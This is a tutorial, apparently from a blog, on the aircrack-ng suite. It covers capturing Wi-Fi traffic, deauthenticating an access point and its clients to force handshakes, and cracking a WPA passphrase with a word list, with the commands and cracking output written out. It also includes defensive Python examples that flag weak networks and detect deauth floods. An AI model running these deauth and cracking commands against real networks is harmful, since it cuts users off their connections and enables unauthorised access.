Getting Started with airmon-ng
This post will show how to get started using aircrack-ng to discover wi-fi networks, capture handshakes, deauth clients, and crack passwords.
Setup airmon-ng
Install aircrack-ng Suite
If you’re using Kali this should come pre-installed, but if not, you can install all the required tools using:
```bash
sudo apt install aircrack-ng
```
Monitor Mode
The first step will be to enable monitor mode on our wi-fi card. Assuming our wireless network adaptor is `wlan0`, we put our card into monitor mode using:
```bash
airmon-ng start wlan0
```
You should now have a new wireless network adaptor that has the same name with `mon` appended to the end. So our adaptor will be called `wlan0mon`.

Additionally, you may need to kill some processes that can cause issues. This can be done using:

```bash
airmon-ng check kill
```
Capturing Packets
Basic Capture
We can begin a basic capture and log the results. This will allow us to cycle through the wi-fi channels and discover Access Points and Clients.

```bash
airodump-ng -w wifiScan1 wlan0mon
```

- `-w` specifies the prefix for the output files.
- This only listens on the 2.4 GHz range.
From the above command you’ll see two separate tables. For the first table:
| Column | Meaning |
|---|---|
| BSSID | MAC address of the AP |
| ESSID | Name of the Wi-Fi Network |
| Beacons | Number of Beacon Frames received from the AP |
| CH | The current channel of the AP |
| ENC, CIPHER & AUTH | Encryption & Authentication details |
For the second table:
| Column | Meaning |
|---|---|
| BSSID | MAC address of the AP the client is communicating with |
| Station | MAC address of the client |
| Frames | Data Frames received from the client |
| Probes | Wi-Fi network the client is communicating with |
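As an added example (not code from the original post or from the aircrack-ng project), here is a small parser that turns the two tables above into records a defender can act on. It reads the CSV file that airodump-ng writes next to the `.cap` when `-w` is used (for the command above, `wifiScan1-01.csv`); the field order below is an assumption about that CSV layout, not something the post states, and the sample rows are constructed around the post's example network. It flags open, WEP and WPA/TKIP networks and lists clients that are probing for network names while not associated, which is the information a site survey with this tool is usually after.

```python
"""Parse the CSV that airodump-ng writes alongside the .cap and flag weak networks.

Added example; not code from the original post or the aircrack-ng project.
Assumption: with -w <prefix>, airodump-ng also writes <prefix>-01.csv with an
AP table (header starting "BSSID"), a blank line, and a station table (header
starting "Station MAC"); multiple probed ESSIDs are comma separated.
The sample rows below are constructed.
"""
import csv
import io

# Constructed sample input in the assumed airodump-ng CSV layout.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
11:22:33:44:55:66, 2022-02-05 12:05:01, 2022-02-05 12:06:02, 4, 130, WPA2, CCMP, PSK, -28, 594, 0, 0.0.0.0, 8, TestWifi,
AA:BB:CC:DD:EE:01, 2022-02-05 12:05:03, 2022-02-05 12:06:00, 6, 54, OPN, , , -60, 120, 0, 0.0.0.0, 9, GuestOpen,
AA:BB:CC:DD:EE:02, 2022-02-05 12:05:05, 2022-02-05 12:05:59, 11, 54, WEP, WEP, , -70, 80, 12, 0.0.0.0, 6, OldNet,
AA:BB:CC:DD:EE:03, 2022-02-05 12:05:06, 2022-02-05 12:05:58, 1, 54, WPA, TKIP, PSK, -72, 60, 0, 0.0.0.0, 6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
22:44:66:88:33:55, 2022-02-05 12:05:10, 2022-02-05 12:06:01, -41, 977, 11:22:33:44:55:66, TestWifi
33:55:77:99:AA:BB, 2022-02-05 12:05:12, 2022-02-05 12:05:50, -55, 40, (not associated), CoffeeShop,HomeNet
"""


def parse_airodump_csv(text):
    """Return (aps, stations): the AP table and the station table as lists of dicts."""
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or all(not cell.strip() for cell in row):
            continue  # blank separator line between the two tables
        first = row[0].strip()
        if first == "BSSID":
            section = "ap"
            continue
        if first == "Station MAC":
            section = "station"
            continue
        if section == "ap" and len(row) >= 14:
            aps.append({
                "bssid": first,
                "channel": int(row[3]),
                "privacy": row[5].strip(),   # ENC column of the live view
                "cipher": row[6].strip(),    # CIPHER column
                "auth": row[7].strip(),      # AUTH column
                "power": int(row[8]),
                "beacons": int(row[9]),
                "essid": row[13].strip(),
            })
        elif section == "station" and len(row) >= 6:
            stations.append({
                "station": first,
                "power": int(row[3]),
                "frames": int(row[4]),
                "bssid": row[5].strip(),     # "(not associated)" when the client has no AP
                "probes": [p.strip() for p in row[6:] if p.strip()],
            })
    return aps, stations


def classify_ap(ap):
    """Label an AP by the weakest thing in its ENC/CIPHER columns."""
    if ap["privacy"] == "OPN":
        return "open"      # no encryption at all
    if "WEP" in ap["privacy"]:
        return "broken"    # WEP keys are recoverable from captured traffic
    if "TKIP" in ap["cipher"]:
        return "legacy"    # WPA/TKIP; should move to WPA2/CCMP or WPA3
    return "ok"


def weak_access_points(aps):
    """(bssid, essid, label) for every AP that is not WPA2/WPA3 with CCMP."""
    return [(ap["bssid"], ap["essid"], classify_ap(ap))
            for ap in aps if classify_ap(ap) != "ok"]


def unassociated_probers(stations):
    """Clients that are not connected but are advertising the networks they look for."""
    return [(s["station"], s["probes"])
            for s in stations if s["bssid"] == "(not associated)" and s["probes"]]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid, essid, label in weak_access_points(aps):
        print(f"{label:7} {bssid} {essid}")
    for mac, probes in unassociated_probers(stations):
        print(f"probing {mac} -> {', '.join(probes)}")
```

Point the script at the real `wifiScan1-01.csv` by reading the file into `parse_airodump_csv` instead of `SAMPLE_CSV`; the "(not associated)" marker and the comma-separated probe list are the two layout details most worth checking against the file your version of airodump-ng produces.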
Advanced Capturing
After seeing what networks are around, we can target specific channels and ESSIDs. Let’s say our target wi-fi network is `TestWifi`, and is using channel `4`.

```bash
airodump-ng -a -c 4 --essid "TestWifi" -w wifiScan2 wlan0mon
```

- `-a` only show associated clients
- `-c 4` only capture on channel 4
- `--essid "TestWifi"` only show APs with the ESSID of “TestWifi”
Sample output:

```text
CH 4 ][ Elapsed: 1 min ][ 2022-02-05 12:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
11:22:33:44:55:66 -28 100 594 799 0 4 130 WPA2 CCMP PSK TestWifi

BSSID STATION PWR Rate Lost Frames Notes Probes
11:22:33:44:55:66 22:44:66:88:33:55 -41 12e-24 34 977 TestWifi
```
Because we are saving the output, a capture file (`.cap`) is included as part of this. However, unless a client connects while we are listening, we won’t have any handshakes recorded.

If there are already clients connected, we can attempt to forcibly disconnect them and listen for the handshake when they re-connect.
Deauthing Users
While the previous command is running and we’re capturing handshakes, we can open another terminal and de-auth an AP, or a specific client connected to an AP.
Target an AP:
```bash
aireplay-ng -0 10 -a 11:22:33:44:55:66 wlan0mon
```

- `-0 10` deauth mode; perform the deauth attack 10 times.
- `-a` MAC address of the AP.
Target a Client connected to an AP:
```bash
aireplay-ng -0 10 -a 11:22:33:44:55:66 -c 22:44:66:88:33:55 wlan0mon
```

- `-c` MAC address of the client
After performing this attack, the capture should be left running for at least a few minutes to allow the clients to re-connect.
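As an added example (not code from the original post or from aircrack-ng), the script below shows what the deauthentication bursts above look like from the defender's side. It parses the fixed 802.11 management header (frame control and the three addresses) plus the two-byte reason code of deauthentication frames, and raises an alert when a single BSSID sees more than a threshold of them inside a sliding time window. The frames are constructed in-line with `make_deauth()` so it runs offline; the `window` and `threshold` values are assumptions to tune per environment.

```python
"""Detect deauthentication floods in raw 802.11 management frames.

Added example; not code from the original post or the aircrack-ng project.
Input is (timestamp_seconds, raw_frame_bytes) pairs; on a real capture those
would come from the .cap file, here they are constructed by build_sample_frames().
"""
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0        # 802.11 frame type 0 = management
DEAUTH_SUBTYPE = 12  # management subtype 12 = deauthentication
BEACON_SUBTYPE = 8


def mac_to_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_to_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def make_deauth(bssid, client, reason=7, seq=0):
    """Build a deauthentication frame as constructed test input (no transmission).
    Reason 7 is IEEE 802.11 'class 3 frame received from nonassociated STA'."""
    fc = (DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2)          # 0xC0, protocol version 0
    header = (struct.pack("<HH", fc, 0)                    # frame control, duration
              + mac_to_bytes(client)                       # addr1: destination
              + mac_to_bytes(bssid)                        # addr2: source
              + mac_to_bytes(bssid)                        # addr3: BSSID
              + struct.pack("<H", seq << 4))               # sequence control
    return header + struct.pack("<H", reason)


def parse_mgmt_frame(frame):
    """Decode the fixed header of a management frame; None for anything else."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != MGMT_TYPE:
        return None
    reason = None
    if subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return {
        "subtype": subtype,
        "dst": mac_to_str(frame[4:10]),
        "src": mac_to_str(frame[10:16]),
        "bssid": mac_to_str(frame[16:22]),
        "reason": reason,
    }


def detect_deauth_floods(frames, window=10.0, threshold=20):
    """Return [(bssid, window_start_ts, count)] once a BSSID sees `threshold`
    deauths within `window` seconds (one alert per BSSID)."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, raw in frames:
        info = parse_mgmt_frame(raw)
        if info is None or info["subtype"] != DEAUTH_SUBTYPE:
            continue
        q = recent[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()                                    # drop frames outside the window
        if len(q) >= threshold and info["bssid"] not in alerted:
            alerted.add(info["bssid"])
            alerts.append((info["bssid"], q[0], len(q)))
    return alerts


def build_sample_frames():
    """Constructed input: a 40-frame burst on one BSSID, normal churn on another."""
    bssid, client = "11:22:33:44:55:66", "22:44:66:88:33:55"
    frames = [(100.0 + i * 0.05, make_deauth(bssid, client, seq=i)) for i in range(40)]
    other = "aa:bb:cc:dd:ee:ff"
    frames.append((130.0, make_deauth(other, "de:ad:be:ef:00:01", reason=3)))  # STA leaving
    frames.append((190.0, make_deauth(other, "de:ad:be:ef:00:02", reason=3)))
    beacon = (bytes([BEACON_SUBTYPE << 4, 0x00]) + b"\x00\x00" + b"\xff" * 6
              + mac_to_bytes(other) * 2 + b"\x00\x00")   # must be ignored by the detector
    frames.append((131.0, beacon))
    return sorted(frames, key=lambda f: f[0])


if __name__ == "__main__":
    for bssid, start, count in detect_deauth_floods(build_sample_frames()):
        print(f"deauth flood: {count} frames against {bssid} from t={start}")
```

On a real capture the raw frames are the management frames in the `.cap` written by airodump-ng. Where the AP and its clients support 802.11w (Protected Management Frames), unauthenticated deauthentication frames like these are discarded by the receiver, so the forced re-connect this section relies on does not happen.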
Crack Passwords
Assuming our attack was successful, we can analyse the output `.cap` file for handshakes and attempt to crack them offline. Let’s analyse the output file `wifiScan2-01.cap` from our previous capture and attempt to crack the password using the rockyou word list:

```bash
aircrack-ng wifiScan2-01.cap -w rockyou.txt
```

```text
Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.

# BSSID ESSID Encryption

1 11:22:33:44:55:66 TestWifi WPA (1 handshake, with PMKID)

Choosing first network as target.

Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.

1 potential targets
```
- Normally you would be asked which target you want to crack; however, since there is only one, it is selected automatically.
The cracking will now start:
```text
Aircrack-ng 1.6

[00:00:04] 78245/14344391 keys tested (20290.49 k/s)

Time left: 11 minutes, 43 seconds 0.55%

Current passphrase: sukiyaki

Master Key : 23 17 DE 4E 8C FC 74 67 82 3F 04 E9 0A 22 CE 25
FD 01 FA DB 29 D2 3A 2C 79 F0 7D 05 36 DA 48 1B

Transient Key : E9 B7 AD 37 73 E5 A5 15 24 30 7A F0 64 AF 3B 14
EB 68 02 69 EE D2 C4 DF 80 C6 9F E6 11 00 E2 A8
FF 8A 66 56 85 AE FE B3 31 06 16 AC 6B 1A E1 DA
AB 21 AA 22 C9 9E 42 3E 3D ED 28 C1 F7 F1 AE E3

EAPOL HMAC : B8 16 E5 77 E5 AB BD B6 1A 3A 69 A3 19 1C 21 C4
```
The above attack is running at around 20 thousand keys per second. This is running on an Intel Core i7 8700. We can improve the performance a lot by using Hashcat instead of aircrack-ng to crack the password. You can read how to do that here.